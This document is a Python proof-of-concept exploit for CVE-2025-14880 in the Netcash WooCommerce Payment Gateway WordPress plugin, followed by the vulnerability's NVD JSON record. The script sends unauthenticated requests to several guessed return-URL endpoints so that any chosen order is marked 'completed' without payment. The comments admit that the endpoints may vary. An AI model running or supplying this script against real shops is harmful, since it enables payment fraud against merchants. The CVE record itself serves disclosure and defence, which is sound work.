CVE-2025-14880

import requests # CVE-2025-14880 PoC - Unauthorized Order Status Modification # Target: Netcash WooCommerce Payment Gateway plugin <= 4.1.3 target_url = "https://vulnerable-site.com/" return_url_endpoint = "?wc-gateway-return=netcash" # Target order ID (can be any order ID) order_id = "12345" # Malicious payload to mark order as completed payload = { "wc_order": order_id, "status": "completed" # or "processing" } # Construct exploit URL # Note: The actual endpoint may vary based on plugin configuration # Common patterns: # 1. /?wc-gateway-return=netcash&wc_order={id}&status=completed # 2. /?wc-api=wc-gateway-paynow&wc_order={id}&status=completed # 3. /checkout/order-received/{id}/?key=wc_order_{id}&status=completed exploit_urls = [ f"{target_url}?wc-gateway-return=netcash&wc_order={order_id}&status=completed", f"{target_url}wc-gateway-return/netcash/?wc_order={order_id}&status=completed", f"{target_url}?wc-api=wc-gateway-paynow&wc_order={order_id}&status=completed" ] print("CVE-2025-14880 PoC - Testing order status modification...") print(f"Target Order ID: {order_id}") print("-" * 60) for url in exploit_urls: try: response = requests.get(url, timeout=10, allow_redirects=False) print(f"\n[Testing] {url}") print(f"Status Code: {response.status_code}") # Check if order status was modified successfully # In real attack, verify via WooCommerce REST API or admin panel if response.status_code in [200, 302, 301]: print("[!] Request sent - check order status manually") except requests.exceptions.RequestException as e: print(f"[Error] {e}") print("\n[*] Note: Successful exploitation allows marking any order as completed without payment")

{"cve": {"id": "CVE-2025-14880", "sourceIdentifier": "[email protected]", "published": "2026-01-14T06:15:53.520", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Netcash WooCommerce Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_return_url function in all versions up to, and including, 4.1.3. This makes it possible for unauthenticated attackers to mark any WooCommerce order as processing/completed."}, {"lang": "es", "value": "El plugin Netcash WooCommerce Payment Gateway para WordPress es vulnerable a la modificación no autorizada de datos debido a una comprobación de capacidad faltante en la función handle_return_url en todas las versiones hasta la 4.1.3, inclusive. Esto hace posible que atacantes no autenticados marquen cualquier pedido de WooCommerce como en procesamiento/completado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/netcash-pay-now-payment-gateway-for-woocommerce/tags/4.1.3/includes/class-wc-gateway-paynow.php#L1127", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3438674/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ca11df6-83e3-48b5-84b8-3f3e4f75ac4a?source=cve", "source": "[email protected]"}]}}